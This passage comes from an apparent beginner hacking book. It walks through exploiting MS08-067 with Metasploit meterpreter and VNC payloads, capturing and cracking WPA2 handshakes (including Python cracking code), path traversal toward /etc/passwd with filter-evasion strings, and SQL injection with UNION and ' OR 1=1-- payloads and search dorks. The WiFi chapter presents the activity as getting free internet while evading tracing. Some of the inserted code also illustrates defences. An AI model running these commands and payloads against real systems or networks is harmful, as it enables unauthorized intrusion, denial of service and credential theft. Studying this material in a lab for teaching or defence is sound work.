code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service
packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.

It appears from this description that if the wrong target is chosen the
exploit could just as well crash the machine; on a real engagement that is a
denial of service, so pick the target carefully. Let's proceed with using
the exploit. Type the following into the msf console. You can use tab
completion if you do not remember the exact name of the exploit.
msf > use windows/smb/ms08_067_netapi
With the command show targets we again list the operating system versions
that are vulnerable to this exploit (the Automatic Targeting entry
fingerprints the host for you).
msf exploit(ms08_067_netapi) > show targets
With the command show payloads we see a list of compatible payloads.
msf exploit(ms08_067_netapi) > show payloads
As you can see there is no shortage of payloads that we can use. Yet finding
one you can easily work with is not trivial. One possible payload is
vncinject/bind_tcp, which injects a VNC server into the target and opens a
listening port on it for us to connect to.
msf exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/bind_tcp
Now that we have chosen the payload we still need to enter details of the
target machine so the exploit can perform its attack. With the command show
options we get an overview of the settings a user needs to enter. These of
course will differ across exploits and payloads.
msf exploit(ms08_067_netapi) > show options
Figure 57. The netapi vulnerability has no shortage of payloads
For the bind_tcp payload we see a series of required inputs. However, some
already have a default value. We will use those and only input the ones that
are absolutely necessary. One of those is RHOST, the IP address of our
target. In this case that is our Windows XP lab machine, which I can locate
at 192.168.1.102.
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.102
For this payload all necessary details have been entered. To perform the
exploit we now simply input the command exploit.
msf exploit(ms08_067_netapi) > exploit
You will now gain access to a virtual screen of the Windows XP target. You
can move your cursor across the screen and even click on folders and
applications. To prove you have control you can simply shut down the target
machine (a lab machine, that is, not a client's server).
Another useful payload that may be more efficient and less likely to alert
any user of the target machine is a command shell. Instead of the vncinject
payload we will use Meterpreter.
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

The reverse_tcp payload is useful because the target machine will be the one
to make the TCP connection back to us, which gets through firewalls that
block incoming connections but allow outgoing ones. To complete the payload
we must set LHOST to our own IP address (the one the target can reach us on)
and, if not already done, RHOST to the target (192.168.1.102). Once set we
can use the command exploit to yet again penetrate our target machine.
This time we are given a Meterpreter session on the Windows XP target. With
sysinfo and ipconfig you can verify the identity of your target, and with
the shell command you drop into a Windows CMD prompt; I hope you remember
your Windows CMD commands, they will come in handy here. It is even possible
to open a VNC graphical desktop with the command run vnc.

Concluding remarks
Playing around with Metasploit can really help those new to pen testing to
get a feel for what it is all about. Chances are that if you worked through
this chapter you have performed your first true hack. Don't be fooled into
thinking that your new-found skills are useless just because your target is
a Windows XP machine. At the time of writing Windows XP still counts as the
third most popular OS in the world after Windows 7 and Windows 10. Windows
XP endured for a very long time before its replacement became available, and
as such it can be found on many embedded systems, servers and other machines
that have run for years. They will continue to do so for many more years.
If you want to try your luck with other exploits just type back in the msf
console to leave the current module.
All this presumes you have found vulnerabilities for your target system. It
is quite possible you haven't. Perhaps you do know the target operating
system, the version number of the OS and those of the services that are
running, from your work in reconnaissance and scanning (nmap -sV). With
Metasploit we can search for all known vulnerabilities using this
information. To list all Windows file-format exploits, for example, enter
the following.
msf > search exploit/windows/fileformat/
Other paths you can choose from are unix, multi, solaris, firefox, apple_ios
and a few others. Remember, you can get to know your target machine a lot
better by performing extensive scans to detect vulnerabilities. A powerful
tool such as Nessus is invaluable, but there is the danger that you won't
learn anything about the underlying cause of the vulnerabilities. Finally
you have made it to the really juicy part of exploitation!

Chapter 4 Wireless hacking

How to hack WIFI for free internet
One of the basic tenets of hacking is making sure that no one can find you
if they do put a trace on you. I am pretty sure they won't send any attack
helicopters if you break into something, because people generally feel a
sense of futility when hacked. However, it is possible if you provoke a
target long enough or you hack somebody who really doesn't appreciate it.
One way to diminish the risk of being tracked down is to use wireless
internet, or Wi-Fi. Now you are not stuck to an Ethernet cable that goes to
your own router (that's a smoking gun), but instead you use somebody else's
Wi-Fi connection. All you need is the password to gain access to that
network. Needless to say, using somebody else's network without permission
is illegal in most countries; practice on your own network, as this chapter
suggests. To gain access to a Wi-Fi network there are three levels of
difficulty.
1. No password protection
This was once the most popular Wi-Fi set-up. No one bothered to put up a
password. However, people have gotten smart and now are unwilling to have
somebody ride along on their Wi-Fi. Also, because manufacturers of wireless
routers now ship them with a password as standard procedure, this is
becoming uncommon in residential areas. However, a lot of businesses such as
coffee shops and lunchrooms offer free Wi-Fi internet. Just don't forget that
you shouldn't access anything on the internet with your name on it, because
if you're going the way of the black hat hacker the police can reconstruct a
lot using digital forensics.
2. WEP protection
The second difficulty level is a wireless set-up protected by WEP
encryption. These are also becoming uncommon because WEP was broken years
ago: with enough captured packets the key can be recovered in minutes, no
word list needed.
3. WPA/WPA2 encryption
WEP has been replaced by WPA/WPA2. In theory the hack is pretty much
impossible if the users chose a long, truly random passphrase. However, its
security is flawed when people fill in simple passwords that they can easily
remember. And so enter the hacker word list. A word list is a very long list
of commonly used names, phrases and such that we will try one by one as the
password for the network. One popularly used list is darkc0de.lst. You can
download it from the internet[12]. Essentially it is a text file around 17
MB in size which has been compiled by hackers. We will be using the list to
perform our hacks. You can also make your own list.

The guide below will give you an overview of what is needed to hack into a
Wi-Fi network. It assumes your wireless card is in monitor mode: mon0 is the
monitor interface that airmon-ng creates on top of your wireless adapter
(newer versions of the aircrack-ng suite call it wlan0mon instead;
substitute that name throughout). The first step is optional. You should
change the MAC address of the network device you're using. This is not for
security purposes, but it makes it easier to distinguish your own device
from others. For this step we first need to shut down our network device
mon0. This is almost the same as putting it in flight mode.
root@kali:~# ifconfig mon0 down
root@kali:~# macchanger -m 00:11:22:33:44:55 mon0
root@kali:~# ifconfig mon0 up
Note that the structure of the MAC address will need to be the same as
before, but any new series of numbers will do. The last command brings the
network device back up.
During the second step we will start to collect data on potential Wi-Fi
networks that can be hacked. Type in the following airodump-ng command.
root@kali:~# airodump-ng mon0
You should see a list of wireless networks. You should also see your own
network, otherwise you are doing something wrong. It could be that many of
the networks are out of range and that you can only access your own. Well,
for the purposes of this exercise you should then hack your own, so you at
least know how it is done. Next time you can use a place which you know has
Wi-Fi to try your luck. Word to the wise: usually wireless signals travel
further in the morning.
Now that you have successfully compiled a list of wireless networks you can
begin your analysis. As you look at the column ENC (Encryption) you will
mostly see WPA2, some WPA and even fewer WEP encrypted networks. Perhaps you
even see one or two open networks. Well, we are here to hack and not to play
things easy, so we will ignore all those that are not WPA/WPA2. Just pick a
WPA2 network, as our method will work the same for WPA.
During the third step we will listen to one access point in the hope that a
client will reveal itself. We refer to a wireless device that is connected
to the access point and transmits as a station. An access point without any
station is not interesting: the handshake we need below only happens when a
station (re)connects. So let's show how this works.
The command below can be broken down as follows. We specify what channel we
are listening to with -c, giving the channel number at X. With -w we specify
that we want to write the capture to disk; the string afterward is the file
name prefix for that purpose.
The --bssid option specifies that we listen to just one access point. This is
needed because more than one device can be on the same channel. Copy the
BSSID of the target from the airodump-ng listing into the command you're
writing. The --ivs flag makes airodump-ng save only the initialization
vectors (and WPA handshakes), which keeps the file small, and with mon0 we
specify the device we want to use.
root@kali:~# airodump-ng -c X -w WPACrackTest --bssid XX:XX:XX:XX:XX:XX --ivs mon0

Next you should see a station listed in the lower half of the screen.
Finding a station is important, as it means we have found a client we can
knock off the network and watch reconnect. If you don't find a station, then
this will not work and you will need to pick another target. I know, I know,
that is a bitch, but try it a few times anyway to get used to this whole
procedure. We are almost done anyway.
Now if you did get a station, well, that is wonderful. Keep the command
running because we need to capture the handshake between the station and the
router.
Open up an extra terminal window. Next we will tease the wireless router by
sending a deauthentication frame, which kicks the station off the network;
its reconnect is the WPA handshake we want. The command below can be broken
down as follows. -0 selects the deauthentication attack and the 1 is the
number of deauth bursts sent: we will send just the one, not a hundred! At
NAMEOFROUTER fill in the name of the wireless router you want to hack. You
can find that under ESSID in the previous terminal. Be careful with the
capital letters.
root@kali:~# aireplay-ng -0 1 -e NAMEOFROUTER mon0
If the command went well and the handshake was captured, you should be able
to see this in the terminal in which airodump-ng is running: at the top of
the screen the text [ WPA handshake: XX:XX:XX:XX:XX:XX ] pops up.
If everything went alright and you have found a viable target we can perform
the final phase, and that is guessing the password used by the target. You
will need to know the path to the wordlist you're keeping. If you have
darkc0de.lst just put it on the Desktop. The last command is as follows.
root@kali:~# aircrack-ng -w /root/Desktop/darkc0de.lst WPACrackTest-01.ivs
Note that we made the file earlier with the extension .ivs. airodump-ng adds
-01 (then -02 and so on for each new run) to the prefix we gave it with -w,
so check the exact name of the file. After you enter the command aircrack-ng
will work through the entire word list to find the correct password: for
every candidate it derives the key from the passphrase and the network name
and checks whether that key reproduces the MIC in the captured handshake. If
the password isn't in there, then tough! You can try other word lists;
believe it or not, there is a whole industry online producing them. You can
also use a program called Crunch to generate your own lists, and Hashcat to
run the same check far faster on a GPU. If you want to check whether this
method works at all, insert the password of your own network into the word
list when hacking your own network. Have fun. And above all be patient.
WPA/WPA2 cracking can take a very long time!
With this series of commands you had to specify a lot yourself, but there
are also automated programs that walk through the networks available to you,
such as Wifite. Reaver is worth a look too, although it attacks WPS rather
than the handshake. Check them out as well.
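To see what aircrack-ng is actually doing while it grinds through the word list, here is the same check written out in Python. This is an added example and not code from the original text or from the aircrack-ng project; the SSID, MAC addresses, nonces, EAPOL frame and word list are all made up so that it runs without a capture file. In the real case a parser would pull those values out of the .ivs or .cap file.

```python
import hashlib
import hmac

# Added example: the per-candidate check a WPA2-PSK cracker performs.
# Everything below (SSID, MACs, nonces, EAPOL frame, word list) is constructed
# for the demo; it is not data from a real capture.

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    The SSID is the salt, which is why a word list has to be run per network.
    (Passphrases are 8 to 63 characters in a real network.)"""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: expands the PMK with both MAC addresses and both
    nonces. The nonces only exist in the handshake, hence the capture."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):  # 4 x 20 bytes covers the 64-byte PTK
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP key MIC: HMAC-SHA1 over the EAPOL-Key frame (with its 16-byte
    MIC field zeroed), truncated to 16 bytes. WPA/TKIP uses HMAC-MD5 instead."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_handshake(hs: dict, wordlist):
    """Try every candidate; return the passphrase whose derived KCK reproduces
    the MIC captured in the handshake, or None if the list is exhausted."""
    for candidate in wordlist:
        ptk = derive_ptk(derive_pmk(candidate, hs["ssid"]), hs["ap_mac"],
                         hs["sta_mac"], hs["anonce"], hs["snonce"])
        kck = ptk[:16]  # Key Confirmation Key = first 128 bits of the PTK
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return candidate
    return None


# --- constructed "capture" -------------------------------------------------
SSID = "TestNet"                         # the ESSID airodump-ng showed
AP_MAC = bytes.fromhex("001122334455")   # BSSID
STA_MAC = bytes.fromhex("66778899aabb")  # STATION
ANONCE = bytes(range(32))                # from message 1 of the handshake
SNONCE = bytes(range(32, 64))            # from message 2
# Message 2's EAPOL-Key frame with the MIC field set to zero (99 bytes here).
EAPOL_M2 = bytes.fromhex("0103005f02010a00") + bytes(91)
TRUE_PASSPHRASE = "tr0ub4dor&3"


def make_handshake(passphrase: str) -> dict:
    """Build what a capture parser would hand the cracker, computing the MIC
    the way the real station does. Used only to fabricate the demo capture."""
    ptk = derive_ptk(derive_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return {"ssid": SSID, "ap_mac": AP_MAC, "sta_mac": STA_MAC,
            "anonce": ANONCE, "snonce": SNONCE, "eapol": EAPOL_M2,
            "mic": eapol_mic(ptk[:16], EAPOL_M2)}


HANDSHAKE = make_handshake(TRUE_PASSPHRASE)
WORDLIST = ["password", "12345678", "letmein99", TRUE_PASSPHRASE, "qwertyuiop"]

if __name__ == "__main__":
    print("found:", crack_handshake(HANDSHAKE, WORDLIST))
    print("found:", crack_handshake(HANDSHAKE, ["password", "12345678"]))
```

Two things stand out once you see it written down: the SSID is the salt for PBKDF2, so a precomputed table only helps against one network name, and the 4096 HMAC-SHA1 rounds per candidate are the reason a GPU cracker such as Hashcat beats aircrack-ng on a CPU by such a margin.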

Mr. Robot:
Between madness and reality

Hacking can be a hit or miss business in movies and on TV. Not so with the
new TV-series created by Sam Esmail. The show features Rami Malek as
Elliot Alderson. Elliot is a grey-hat hacker. He has a day job in IT security but
at night transforms into a vigilante hacktivist. He joins a secretive organization
called fsociety in an effort to expose the corrupt practices of E-Corp. So far a
lot may sound familiar, but Mr. Robot beats expectations by depicting a
realistic scenario of how a corporate hack may be perpetrated. In addition, the
delusions Elliot has of his friends and family makes you wonder what if
anything on this show is real.
The cast is expanded with excellent performance from Christian Slater, Martin
Wallström and BD Wong.
So what hacking methods are used? One of Elliot's friends suffers an
embarrassing revelation when she uses a CD that contains autorun spyware.
Similarly, an SD card with a rootkit is used to gain access to an Android
phone. Elliot attempts to hijack E-Corp's climate control system by planting a
Raspberry Pi in a so-called "man in the middle" attack. Hacks against such
Industrial Control Systems (ICS) are increasingly common. Elliot also
uses a proximity card cloner; such a device copies the contents of an access
card to allow unfettered access to any part of a building. During season 2
Elliot plants spyware on a smartphone enabling him to listen to every
conversation even if the phone is not in use. Such spyware is freely available
for sale and is suspected to be in regular use by many of the world's
intelligence agencies.
Mr. Robot has just finished its second season. Be sure to check it if you haven’t
already!

Chapter 5 Path Traversal

Introduction to Path Traversal
Every website you visit runs on a server that outputs the HTML (HyperText
Markup Language) which your browser interprets and renders. However, HTML is
static. To have things like search, personalised pages and other dynamic
content a website uses a server-side language such as PHP to generate the
HTML as you move through the website. Code that builds pages or file paths
from what the visitor sends opens the door to two types of attack. The first
is Path Traversal, whereby you manipulate a parameter in the URL to make the
server read files you aren't supposed to have access to. The second is SQL
Injection, which is the topic of chapter 6. The large majority of web servers
run on Linux (most of them Apache HTTP Server or nginx), so it stands to
reason that they have files such as /etc/passwd and /etc/shadow. Indeed they
do; of course these two files aren't the Holy Grail they once were (passwd no
longer holds password hashes and shadow is readable only by root), but there
are plenty of other interesting files to find.

Path Traversal == Change Directory
To manipulate the URL to go to other places you essentially prepend ../ to
the file name. Those who have been paying attention will notice where this
comes from. The forward slash / separates directories in a Linux path, and ..
we have seen before with the cd command, where it refers to the parent
directory. So ../ means "one directory up", exactly as cd .. does, and
../../ means two directories up.
However, if you were to try this out on a random website you will probably
end up being disappointed as nothing will happen, at least on a typical
website. To move back in the directory structure of a website and explore
parts you weren't supposed to see you have to find a parameter whose value
the server uses as a file name. If for example you see a URL as follows,

URL/index.php?c=page&p=Welcome

then you can alter some of the parameters to try and induce an error message.
For example, changing the word Welcome to anything else that is unlikely to be
a valid page name will do. If you end up seeing a PHP warning such as "failed
to open stream" or other nonsense, the parameter is very likely passed
straight to the file system and you can try path traversal; an error alone is
not proof, the proof is the contents of a file you should not be able to
read. Finding files in hidden locations is not the only possible result. By
systematically navigating through the entire website you may be able to find
a login screen in use by the administrator. As the screen is located where no
one is supposed to find it, perhaps the username and password were never
altered from the default.
For the purpose of this tutorial we keep it simple. The objective remains to
find the passwd file located in the etc directory. You may remember from the
lesson on the Linux file system that etc sits directly under the root
directory /, not under /home/. However, the page you are currently viewing
may be served from a directory several levels below /, so the number of ../
steps needed is unknown. Below you see an example of a systematic search for
the /etc/ directory and the passwd file specifically.

URL/index.php?c=page&p=../etc/passwd

URL/index.php?c=page&p=../../etc/passwd

URL/index.php?c=page&p=../../../etc/passwd

As we have no idea how far back we need to move to reach the root directory
and then the etc folder, we need to perform a number of attempts. The
example above is an illustration, but a website can have many parameters
beyond just c=page. There can also be c=news, c=employees and a lot more, and
each of them may be handled by different code.
To fully exploit a Path Traversal vulnerability you should try and find
important files. Below is a small selection of files any hacker should have a
look at.

Locate database (a list of every file name on the system, a treasure map for
further traversal)
/var/lib/mlocate/mlocate.db
/var/cache/locate/locatedb

Common files (relative to a user's home directory, for example /root/ or
/home/username/)
.profile *
.bashrc
.bash_history
.history
.mysql_history
.shrc

* This file sets environment variables such as PATH when the user logs in.
Reading it tells you where the user's own scripts live; altering it in order
to run scripts would require write access, which plain path traversal does not
give you.

DotDotPWN
A handy tool you can find in the Kali Linux toolkit is DotDotPWN, which will
try and find path traversal vulnerabilities for you. You can start the tool
from the command line. It's a Perl script, so on older installs you start it
as dotdotpwn.pl; on current Kali the command is simply dotdotpwn. A simple
example of DotDotPWN is as follows

dotdotpwn.pl -m http -h websitetotest.com

Here the switch -m indicates the module you wish to use, in this case http
(-h takes a host name, not a URL; the http-url module takes a full URL with
-u and the word TRAVERSAL marking the part to fuzz). Other modules are ftp,
tftp, stdout, which just prints the traversal strings so you can feed them to
another tool, and payload, which sends a text file of your own, given with -p,
with TRAVERSAL replaced by each traversal string in turn.
With the -d switch you can set the depth at which it will look; the default
value is six times ../. With -O (capital O) DotDotPWN first fingerprints the
operating system with nmap so that it only tries the relevant traversal
styles, and with -o you tell it the operating system yourself (unix, windows
or generic). With the -f switch you specify the file that needs to be found;
the default file is, as you may guess, /etc/passwd. Add -k with a string the
file is known to contain, such as root: for /etc/passwd, so that a hit is
recognised reliably rather than by response size alone. Below is a more
complicated version of the DotDotPWN command, where -x gives the port to
connect to since the payload module does not assume one.

dotdotpwn.pl -m payload -h websitetotest.com -x 80 -p ~/test.txt -f /etc/secret -O

Conclusion
In the opening paragraph I stated that the Apache HTTP Server is the world's
most popular. However, Microsoft's IIS (Internet Information Services) also
has a healthy market share. Path Traversal on IIS is not that different, but
Windows accepts both the backslash \ and the forward slash / as a separator,
so try ..\ as well as ../. A Windows file you may want to try and discover is
\Windows\System32\drivers\etc\hosts, which, just like the passwd file on
Linux, always exists and is readable by everyone.
Path Traversal remains popular with hackers. It has elements of both
reconnaissance and exploitation. However, input filters are steadily being
applied more and more. To bypass a filter you have to guess what it does: if
it strips the sequence ../ once, ....// becomes ../ after stripping; if it
looks for literal dots and slashes, URL-encoded forms such as %2e%2e%2f or
double-encoded %252e%252e%252f may slip through; and on older PHP versions a
%00 (the "poison null byte") after the file name cut off any extension the
application appended, such as .php or .html.
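The systematic search above and the filter tricks from this conclusion can be put together in a few lines of Python. This is an added example, not code from the original text: it generates the candidate p= values, shows why a filter that strips ../ once is beaten by ....//, and ends with the check a developer should use instead. The document root /var/www/html/pages is made up.

```python
import os

# Added example; not code from the original page. DOC_ROOT is a made-up
# document root, and the candidate strings are the ones the chapter describes,
# generated rather than typed by hand.
DOC_ROOT = "/var/www/html/pages"


def percent_encode(s: str) -> str:
    """Encode every dot and slash: ../ becomes %2e%2e%2f."""
    return s.replace(".", "%2e").replace("/", "%2f")


def traversal_candidates(target: str = "/etc/passwd", max_depth: int = 6):
    """Yield p= values for the systematic search: ../ repeated 1..max_depth
    times, plus the encoded and ....// variants for getting past filters."""
    target = target.lstrip("/")
    for depth in range(1, max_depth + 1):
        plain = "../" * depth + target
        yield plain
        yield percent_encode(plain)                      # %2e%2e%2f...
        yield percent_encode(plain).replace("%", "%25")  # double-encoded
        yield "....//" * depth + target                  # survives one strip


def naive_filter(value: str) -> str:
    """A filter that removes '../' exactly once: the kind ....// defeats."""
    return value.replace("../", "")


def survives_filter(value: str) -> bool:
    """Does the value still climb out of the directory after naive_filter?"""
    return naive_filter(value).startswith("../")


def resolve_vulnerable(requested: str) -> str:
    """Path built the way include($dir . $p) builds it: no checks at all."""
    return os.path.join(DOC_ROOT, requested)


def resolve_safe(requested: str):
    """Canonicalise first, then require the result to lie inside DOC_ROOT.
    realpath also follows symlinks, which string checks on the input miss;
    an absolute path in `requested` is handled too, because os.path.join
    discards DOC_ROOT in that case and the containment check then fails."""
    root = os.path.realpath(DOC_ROOT)
    full = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, full]) != root:
        return None  # refuse anything that escaped the document root
    return full


if __name__ == "__main__":
    for cand in traversal_candidates("/etc/passwd", 2):
        print(f"{cand:42} after naive filter: {naive_filter(cand)!r:28} "
              f"still traverses: {survives_filter(cand)}")
    print(resolve_vulnerable("../../../etc/passwd"))  # happily built
    print(resolve_safe("../../../etc/passwd"))        # None
    print(resolve_safe("Welcome"))                    # inside the root
```

Note that the encoded candidates only matter on the wire: by the time the server's code sees the value it has usually been decoded once, which is exactly why a check that runs on the raw, still-encoded string is unreliable and the canonical-path check in resolve_safe is the one to rely on.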

Chapter 6 SQL Injection
With SQL injection it is possible to manipulate website queries that are sent to
its database (the backend). Websites such as blogs and web shops make use of
Content Management Systems (CMS) to keep track of the wares they sell but
also of users that have access to the back-end. Through direct manipulation of
the website front-end it should be possible to obtain user names and
passwords, including those of the administrator. Once this has been obtained a
malicious person practically has unlimited access.
One possible form of SQL injection is to alter the website's URL that you
see in your browser. If by chance a website is vulnerable to such an attack
some confidential information may be printed on the page for you to read.
Such an attack is explained in the first section. Alternative attacks target
the input boxes of the website, such as its login form. We will discuss such
attacks in the second section.

URL attacks
The most common target for SQL injection are web shops. Their entire
business rests on the underlying database. A product's id, description, price
and picture are all stored in the database and subsequently displayed through
a language like PHP which converts it to HTML on the server side. Most likely
the product id is directly shown in the URL as shown below.
www.webshop.com/index.php?product=101
By manipulating the URL you can perhaps make other parts of the database be
printed out next to the information concerning the product. Before we try our
hand at hacking a website's database I will give an overview of how
database information is retrieved. Web shops store data in an SQL (often
pronounced "sequel") database. A basic SQL statement looks as follows.
SELECT id, name FROM users WHERE id = 1
The structure SELECT ... FROM ... WHERE is the basis of every query that reads
data. Don't mind the capitalized words; the keywords are not case sensitive,
but convention has made it so we write them in upper case. In this case the
SQL statement states that we want the id (identification) and name from a
database table called users for the row whose id is 1. This statement does
presume such data exists. In a database such a table may look like the
following example.
Users
id name password
1 John Doe secret
2 Jane Smith revenge
3 Sam Jones abc1234

Things get interesting if we also assume the table has a column called
password. Obtaining the password is the ultimate goal of our attack, and it is
right there for the taking. We can obtain the password if we manipulate the
query through the URL and alter it beyond the intention of the website
designer.
The best way to find out whether a website is susceptible to an SQL injection
attack is to elicit an error, similar to the way Path Traversal is exposed. If
you can elicit a database error, it means that your input reaches the query
unfiltered. To check the website's address for SQL injection, start by
placing a ' (single quote) behind its address. However, you will need to test
it at a place other than the home address. www.webshop.com is not susceptible
to an attack of the form www.webshop.com' - instead find a spot where the web
address also includes details that can only have come from a database. For
example
www.webshop.com/index.php?product=101'
This address shows the product with id 101 in the database; by adding a ' to
the address we induce a syntax error in the SQL statement used by the website
to retrieve that product. There are more characters that may induce an error
message. I advise to just type in
abc'\$"(#
There are also inputs to probe further and see whether the query can be
steered without producing an error. They come in pairs: if the page with
1 AND 1=1 looks like the normal product page but 1 AND 1=2 comes back empty,
your input is being evaluated as SQL. Examples include,
1 AND 1=1
1 AND 1=2
1' AND 1='1
1' AND 1='2
' OR 1='1
' OR 1=1 #
OR 1=1 #
The quoted variants are for parameters the code wraps in quotes; the # is a
MySQL comment marker that discards whatever the application appends after
your input.
If we are successful in laying bare this error the next step is to try and
retrieve a username and matching password. The SQL statement used by the
website is hardcoded within PHP and looks as follows.
SELECT id, description, price, picture FROM products WHERE product = input
I have written input in italics to underline that this is the only thing that
can be altered. The results of the query, id, description, price and picture,
are placed by the PHP code in their proper format on the website. The
important thing to understand here is that I can only alter the WHERE clause,
which limits my ability to change what is shown on the website. However, a
second query can be pasted behind the first if I use the UNION keyword, which
returns the rows of two queries as one result. Below I show how the URL is
changed and the SQL statement that it carries out.
www.webshop.com/index.php?product=-1 UNION SELECT name, password, 3, 4 FROM users WHERE id = 1
The complete query then becomes as follows.
SELECT id, description, price, picture FROM products WHERE product = -1 UNION SELECT name, password, 3, 4 FROM users WHERE id = 1
This new query that I unleash should get me the name and password of the user
with id equal to 1, shown on the page in the spots where the product's id and
description normally appear. I can retrieve the information of all users by
inputting different numbers. As you may have guessed UNION combines the rows
returned by two queries, whatever tables they come from. I also changed the
WHERE clause of the first query to a value I know does not exist, in this case
-1. This way the first query returns nothing and only my row is displayed. If
the code wraps the value in quotes you first need a ' to close the string,
and a comment marker such as -- at the end to discard the closing quote the
application adds. One important thing to remember is that the number of
columns in both queries needs to be the same. Yet, a users table might have
fewer columns than products. We can add numbers as placeholders instead; I
have used 3 and 4, but anything will do, as long as the types do not clash.
It is important to use the exact number of columns in both queries (I will
mention that twice). You can use the ORDER BY clause to figure that out:
ORDER BY 4 still works but ORDER BY 5 produces an error, so the query has
four columns.

Filter evasion and database information
It may well be that you have tried some of the above on a target that you
found and that nothing worked. Websites do commonly employ filter scripts to
guard against SQL injection. However, there are some work-around characters.
Try appending any of the following three comment markers to your injection
code, so that whatever the application adds after your input is ignored.
-- - # /*
(The space after -- matters in MySQL, which is why "-- -" is the usual way of
writing it; /* opens a block comment that swallows the rest of the statement.)
Using the following as part of an SQL injection can reveal details of the
database used.
SELECT VERSION() - returns the database server version (MySQL; other
databases have their own function for this)
SELECT DATABASE() - returns the name of the current database
SELECT USER() - returns the database account the web application connects
with, not the login of the person running the server
SELECT schema_name FROM INFORMATION_SCHEMA.schemata; - returns the list of
databases
SELECT table_schema, table_name FROM INFORMATION_SCHEMA.tables; - returns
the list of tables
SELECT table_name, column_name FROM INFORMATION_SCHEMA.columns; - returns
the list of columns
Below I have created an example that can give an indication of how to use
more complex SQL injection commands. Can you identify the parts of the
statement and figure out how they work?
' UNION SELECT VERSION() #
The attack that I have explained here is simple, even if it does rely on trial
and error, and is one of the most common web attacks performed! It is
important to know what common names are for tables and columns, but this
information can easily be found online. One thing to remember is that there
are many flavors of SQL database, and some have very different commands. The
first thing to do after you have incited an error message is to figure out
which type of SQL DB is running. The error text itself usually names the
product, and the VERSION() and DATABASE() functions should help with that.

SQL Dorks
As you may have guessed by now any website that has a URL containing a
string such as id=416 or variants thereof is a candidate for this attack. Many
web administrators don't update their software, either out of laziness or for
fear of changing settings. With search engines such as Google you can search
for candidate websites. Just type in inurl:id=416 and you will receive every
indexed page with that string in its address. Such search queries are called
dorks in the hacker community.
If you have your own website, for example a blog, do perform all the necessary
updates and change your permalinks to a format that uses only words instead of
numbers. For example
www.myblog.com/helloworld
instead of,
www.myblog.com/?p=416
Bear in mind that this only keeps you out of the dork results; the real
protection is code that hands user input to the database as a bound parameter
rather than pasting it into the query text. Please note that Google is aware
that its search engine is used in this fashion and from time to time has
prevented such search results from being returned.

Webform injection
Trying to gain access to a user's credentials as outlined above can be seen
as coming in through the back door. There is also another method, which relies
on manipulating the username and password field of a login screen, though
other input fields will work as well. The double dash -- starts a comment in
an SQL statement, so everything the application appends after it is ignored.
Using this as input in a field is a handy way to bypass the rest of the
check. In some cases, inputting a known username followed by '-- will bypass
the code asking for a password, because the AND password = '...' part is
commented out. If you do not know a username you will have to start there.
Input the following in the username field
' OR 1=1--
The WHERE clause now reads name = '' OR 1=1, which is always true, so the
query returns every user and most applications simply take the first row,
which is often the administrator. It is not yet necessary to know the
password (we don't know it anyway) but you may have to type something into
the password field: the server ignores it because it sits behind the comment
marker, but a placeholder value should be entered, otherwise the client-side
form validation may complain. Either the page now greets us with a username,
or we are simply logged in and can continue our hunt from inside. This kind
of attack is still popular, but it is becoming rarer as systems have
increasingly better filters or, better still, use parameterized queries. To
increase your chances there are variations of the input code that you should
also try, such as ' OR '1'='1 or, once you know a username, that name
followed by '-- .
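Both attacks of this chapter, the UNION trick on the ?product= parameter and the ' OR 1=1-- login bypass, can be reproduced offline against a throwaway database, side by side with the parameterized version that defeats them. This is an added example and not code from the original text: an in-memory SQLite database stands in for the web shop's backend, the rows are the users table from earlier in the chapter plus one constructed product, and the PHP is replaced by Python functions that build the query the same way. SQLite understands the -- comment but not MySQL's #, so the payloads use --.

```python
import sqlite3

# Added example, not from the original page. The tables and rows are
# constructed; the vulnerable functions glue user input into the SQL text
# the way the chapter's PHP does, the safe ones bind it as a parameter.


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, description TEXT, price REAL, picture TEXT);
        CREATE TABLE users (id INTEGER, name TEXT, password TEXT);
        INSERT INTO products VALUES (101, 'Blue widget', 9.99, 'widget.png');
        INSERT INTO users VALUES (1, 'John Doe', 'secret');
        INSERT INTO users VALUES (2, 'Jane Smith', 'revenge');
        INSERT INTO users VALUES (3, 'Sam Jones', 'abc1234');
    """)
    return db


# --- the URL attack: index.php?product=... ---------------------------------
def product_vulnerable(db, product: str):
    """The raw ?product= value is pasted into the query text."""
    sql = f"SELECT id, description, price, picture FROM products WHERE id = {product}"
    return db.execute(sql).fetchall()


def product_safe(db, product: str):
    """Same query with the value bound as a parameter: it is only ever
    compared with id, never parsed as SQL."""
    sql = "SELECT id, description, price, picture FROM products WHERE id = ?"
    return db.execute(sql, (product,)).fetchall()


def looks_injectable(db) -> bool:
    """The tick test: a lone ' breaks the statement if input is unfiltered."""
    try:
        product_vulnerable(db, "101'")
        return False
    except sqlite3.OperationalError:
        return True


def count_columns(db, max_cols: int = 20):
    """ORDER BY n errors out once n exceeds the number of selected columns,
    which tells us how many placeholders the UNION needs."""
    for n in range(1, max_cols + 1):
        try:
            product_vulnerable(db, f"101 ORDER BY {n}")
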